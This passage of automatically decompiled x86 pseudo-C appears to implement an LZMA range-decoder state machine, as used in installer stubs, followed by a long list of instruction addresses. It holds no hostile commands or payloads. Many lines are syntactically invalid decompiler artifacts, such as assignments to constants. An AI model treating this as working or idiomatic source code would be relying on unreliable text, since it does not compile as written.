													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                    0x00000000
                    0x004062eb
                    0x004062eb
                    0x004062ef
                    0x00406310
                    0x00406317
                    0x0040631d
                    0x00406323
                    0x00406335
                    0x0040633b
                    0x00406340
                    0x00000000
                    0x004062f1
                    0x004062f7
                    0x004066b8
                    0x004066b8
                    0x004066b8
                    0x004066bb
                    0x004066bb
                    0x004066bb
                    0x004066c1
                    0x004066c7
                    0x004066cd
                    0x004066e7
                    0x004066ea
                    0x004066f0
                    0x004066fb
                    0x004066fd
                    0x004066cf
                    0x004066cf
                    0x004066de
                    0x004066e2
                    0x004066e2
                    0x00406707
                    0x00000000
                    0x00000000
                    0x00406709
                    0x0040670d
                    0x004068bc
                    0x004068d2
                    0x004068da
                    0x004068e1
                    0x004068e3
                    0x004068ea
                    0x004068ee
                    0x004068ee
                    0x00406719
                    0x00406720
                    0x00406728
                    0x0040672b
                    0x0040672e
                    0x0040672e
                    0x00406734
                    0x00406734
                    0x00405ed0
                    0x00405ed0
                    0x00405ed0
                    0x00405ed9
                    0x00000000
                    0x00000000
                    0x00405edf
                    0x00000000
                    0x00405eea
                    0x00000000
                    0x00000000
                    0x00405ef3
                    0x00405ef6
                    0x00405ef9
                    0x00405efd
                    0x00000000
                    0x00000000
                    0x00405f03
                    0x00405f06
                    0x00405f08
                    0x00405f09
                    0x00405f0c
                    0x00405f0e
                    0x00405f0f
                    0x00405f11
                    0x00405f14
                    0x00405f19
                    0x00405f1e
                    0x00405f27
                    0x00405f3a
                    0x00405f3d
